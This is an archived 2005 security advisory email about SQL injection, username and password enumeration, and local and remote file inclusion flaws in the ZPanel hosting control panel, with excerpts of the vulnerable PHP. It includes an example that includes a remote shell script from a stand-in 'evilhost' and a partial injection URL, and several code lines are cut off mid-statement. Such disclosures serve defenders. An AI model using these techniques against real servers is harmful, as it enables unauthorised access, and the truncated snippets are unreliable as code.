From: SecuriTeam <>
To: [email protected]
Date: 22 Mar 2005 18:16:11 +0200
Subject: [NEWS] ZPanel SQL Injection, Arbitrary File Inclusion and Brute Forcing
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ZPanel SQL Injection, Arbitrary File Inclusion and Brute Forcing
" <> ZPanel is a hosting control interface
developed for both Windows and Linux hosts."
Successful exploitation of an input validation vulnerability in ZPanel
scripts allows attackers to execute SQL commands, include remote and local
files. In addition due to poor coding a remote attacker can easily brute
force the username / password combination used to protect the product.
Vulnerable Systems:
* ZPanel version 2.0
* ZPanel version 2.5b10
SQL Injection:
Non sanitized user input variables are fed directly into the SQL query.
Making it possible to inject arbitrary SQL statements through the 'uname'
variable which in turn can be used to bypass the authentication process.
Password Brute Forcing:
An invalid user name or password provided to a remote attacker returns an
error that can be used to determine which of the provided parameter is
wrong. As a result we can use a very simple brute force technique.
Vulnerable script: index.php:
if (isset($_POST['uname'])) {
mysql_select_db($database_Customer_Database, $Customer_Database);
$query_TempUser = sprintf("SELECT * FROM customerbase WHERE servicename =
Arbitrary File Inclusion:
It is possible to include an arbitrary file, local in version 2.5b and
remote in version 2.0:
Where http://evilhost/shell.php - evil PHP code script.
http://localhost/zpanel/zpanel.php?page=billinginfo/index.php%00' OR
Vulnerable code script: zpanel.php ( v2.5b):
if (isset($_GET['page']) && $_GET['page'] != 'main') {
$query_Modules = sprintf("SELECT * FROM modules WHERE name =
$Modules = mysql_query($query_Modules, $Customer_Database) or
$row_Modules = mysql_fetch_assoc($Modules);
if ($row_Modules['active'] == '1') {
$body = "modules/" . $_GET['page'] .
Vulnerable code script: zpanel.php ( v2.0):
if (!isset($_GET['page'])){
$body = "main.php";
$body = $_GET['page'] . ".php";
The information has been provided by <> Mik-.
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